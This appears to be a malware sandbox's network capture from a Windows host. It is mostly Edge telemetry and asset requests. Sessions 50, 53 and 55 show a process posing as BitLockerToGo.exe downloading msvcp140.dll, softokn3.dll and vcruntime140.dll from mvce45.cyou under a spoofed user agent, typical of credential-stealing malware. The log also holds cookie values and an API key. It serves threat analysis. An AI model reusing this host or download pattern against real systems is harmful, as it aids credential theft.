                                                                                                                                                                                                                                                                                                                  Data Ascii: {"acc":1,"webResult":{"msfpc":"GUID=9da112a96bf94f3cb2924374b3afc148&HASH=9da1&LV=202411&V=4&LU=1732200524671","mc1":"9da112a96bf94f3cb2924374b3afc148"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 49818 | 20.189.173.2 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:44 UTC | 1017 | OUT | POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-2.2.2&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732200512000&w=0&anoncknm=app_anon HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 4839
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=252611C791E3634C2B3C04F990FA6290; _EDGE_S=F=1&SID=13E45F7E6D0B6E511AE34A406C8E6FA4; _EDGE_V=1
2024-11-21 14:48:44 UTC | 4839 | OUT
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.AppError","time":"2024-11-21T14:48:32Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","data":{"baseData":{},"baseType":"MS.News.Web.Base","page":{"name":"default","product":"anaheim","type":"dhp","content":{"category":"stand
2024-11-21 14:48:44 UTC | 917 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Length: 153
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=d1e76622bc8b4619ac3c909af03f60a3&HASH=d1e7&LV=202411&V=4&LU=1732200524633; Domain=.microsoft.com; Expires=Fri, 21 Nov 2025 14:48:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=4a21434177e64808a17370d23819c0a2; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 15:18:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 12633
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:43 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
2024-11-21 14:48:44 UTC | 153 | IN
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"acc":1,"webResult":{"msfpc":"GUID=d1e76622bc8b4619ac3c909af03f60a3&HASH=d1e7&LV=202411&V=4&LU=1732200524633","mc1":"d1e76622bc8b4619ac3c909af03f60a3"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 49821 | 13.107.246.40 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:45 UTC | 438 | OUT | GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:46 UTC | 516 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1579
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBDCB5DE99522A
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 49bf1879-901e-000f-7924-3c85f1000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-1777c6cb754vxwc9hC1TEBykgw0000000b7g00000000bd6p
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 49825 | 13.107.246.40 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:45 UTC | 431 | OUT | GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:46 UTC | 516 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1966
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBDCB5EC122A94
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 1c2cb10b-d01e-0008-2f24-3c7374000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-178bfbc474brk967hC1NYCfu6000000001c000000000k8b1
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 49823 | 13.107.246.40 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:45 UTC | 433 | OUT | GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:45 UTC | 536 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1751
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBCEA8D5AACC85
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: fefcdf3e-501e-0074-52f2-3bee41000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-178bfbc474bbbqrhhC1NYCvw7400000001tg00000000ae6d
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 49824 | 13.107.246.40 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:45 UTC | 433 | OUT | GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:45 UTC | 536 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1427
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBDCB5EF021F8E
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 02a9afe5-901e-0026-5ff2-3bf3b3000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-1777c6cb754mqztshC1TEB4mkc0000000ba00000000095y8
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 49822 | 13.107.246.40 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:45 UTC | 430 | OUT | GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:46 UTC | 516 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 2008
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBC9B5C0C17219
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: c24eb943-c01e-0058-5324-3c6c7c000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-1777c6cb754whff4hC1TEBcd6c00000009s000000000s1hd
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 49820 | 13.107.246.40 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:45 UTC | 422 | OUT | GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:46 UTC | 536 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 2229
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBD59359A9E77B
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 998a4015-501e-005d-54f2-3b9803000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-1777c6cb7549x5qchC1TEBggbg0000000bcg00000000253f
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.8 | 49828 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:47 UTC | 238 | OUT | GET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:48 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:47 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:47 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.8 | 49826 | 13.107.246.40 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:47 UTC | 425 | OUT | GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1
Host: edgeassetservice.azureedge.net
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:48 UTC | 523 | IN | HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 14:48:48 GMT
Content-Type: image/png
Content-Length: 1154
Connection: close
Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT
ETag: 0x8DBD5935D5B3965
x-ms-request-id: 559dc2ba-701e-0027-3824-3cf24e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref: 20241121T144847Z-178bfbc474bkvpdnhC1NYCuu2w00000001k000000000t4k9
Cache-Control: public, max-age=604800
x-fd-int-roxy-purgeid: 69316365
X-Cache: TCP_MISS
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.8 | 49827 | 13.107.246.40 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:47 UTC | 431 | OUT | GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1
Host: edgeassetservice.azureedge.net
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:48 UTC | 516 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:48 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1468
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBDCB5E23DFC43
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 559dc2d1-701e-0027-4c24-3cf24e000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144847Z-178bfbc474bfw4gbhC1NYCunf400000001pg0000000087w0
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.8 | 49829 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:51 UTC | 238 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:48:51 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:51 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Thursday, 21-Nov-2024 14:48:51 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.8 | 49830 | 142.250.65.225 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:52 UTC | 594 | OUT | GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:53 UTC | 566 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  Content-Length: 138356
                                                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC5nSRkJ8gzIUjkU4jpv3jtAU5J-UakDjTi3x-bPgV_RzJekqvXPNBkfjL82acg0G2bPjyg
                                                                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                                                                  Date: Wed, 20 Nov 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                                                  Expires: Thu, 20 Nov 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                  Age: 79433
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.8 | 49831 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:54 UTC | 242 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: mvce45.cyou
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-21 14:48:55 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:54 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: close
Last-Modified: Thursday, 21-Nov-2024 14:48:54 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.8 | 49833 | 152.195.19.97 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:55 UTC | 616 | OUT | GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732805314&P2=404&P3=2&P4=ZlQSR0zSHDfjzUqjwz%2fxp3k4u3Td9XB4tbyEB84Gj9VYv7p9STdPutddM%2bTclRAlj3H4KOstpTJClMRVe3fjAQ%3d%3d HTTP/1.1
Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
Connection: keep-alive
MS-CV: Jp9nUpfGNJUIQebNJEwkGC
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
